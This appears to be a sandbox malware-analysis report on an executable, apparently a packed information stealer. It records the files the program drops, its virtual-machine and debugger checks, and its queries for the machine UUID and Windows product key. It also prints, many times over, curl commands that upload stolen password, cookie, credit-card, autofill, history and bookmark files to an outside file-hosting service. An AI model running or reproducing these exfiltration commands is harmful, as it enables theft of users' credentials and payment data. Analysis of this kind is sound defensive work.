Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\main.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,	0_2_00007FF733398840
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF733397800
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7333B2AE4

Source: main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1786073333.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793564892.000001E89359C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1783710038.000001E893604000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000010.00000002.1850359269.000001A228639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\main.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF73339C6FC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333B46F0 GetProcessHeap,

0_2_00007FF7333B46F0

Enables debug privileges

Source: C:\Users\user\Desktop\main.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339C8A0 SetUnhandledExceptionFilter,	0_2_00007FF73339C8A0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF73339BE60
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73339C6FC
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7333AB558

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333BA7E0 cpuid

0_2_00007FF7333BA7E0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
